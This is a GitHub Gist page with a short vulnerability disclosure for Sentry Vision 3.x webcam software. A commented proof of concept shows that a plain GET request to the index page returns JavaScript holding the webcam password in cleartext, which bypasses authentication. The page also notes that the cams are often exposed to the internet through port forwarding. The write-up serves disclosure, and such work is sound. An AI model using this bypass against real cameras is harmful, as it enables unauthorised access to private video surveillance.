Last active
March 29, 2018 12:58
-
-
Save pabloonicarres/c2c284ca7b025d629da39087445ed15d to your computer and use it in GitHub Desktop.
Authentication Bypass Sentry Vision 3.x
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################## | |
| #Sentry Vision 3.x Authentication Bypass | |
| #Paolo Serracino e Pierluca De Santis | |
| #The sentry vision is offered in free download as a security tool for remoting | |
| #webcam surveillance. | |
| #Authentication is managed on client side. A GET request to the index page | |
| #is enough to retrieve the webcam password and to successfully authenticate, | |
| #resulting in access to the victim webcam. | |
| #Due to the nature of the software, vendor also suggests to use port forwarding | |
| #to make the cam reachable (and exploitable) even from WAN. | |
| ################################################################################## | |
| GET http://127.0.0.1:80/ | |
| var pwd = ""; | |
| if(navigator.appName == "Microsoft Internet Explorer"){ | |
| pwd = Prompt.show('Enter Password'); | |
| }else{ | |
| pwd = prompt("Enter Password", ""); | |
| if(pwd == "cleartextpassword"){ | |
| if (screen.height > screen.width) { | |
| document.location = "m.html?in=y"; | |
| } | |
| writeout(); | |
| start(); | |
| start2(); | |
| }else{ | |
| location.href = "deny.html"; | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment